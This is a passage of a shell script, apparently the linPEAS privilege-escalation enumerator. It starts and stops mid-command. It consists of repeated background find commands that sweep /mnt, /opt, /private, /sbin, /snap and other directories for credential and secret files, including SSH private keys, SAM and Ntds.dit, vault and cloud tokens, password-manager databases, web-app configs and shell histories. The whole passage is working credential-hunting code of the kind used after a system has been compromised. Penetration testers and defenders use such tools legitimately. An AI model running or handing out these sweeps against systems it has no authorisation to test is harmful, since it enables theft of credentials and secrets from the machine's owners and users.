\"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_RUN=`eval_bckgrd "find /run -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"ddclient.conf\" 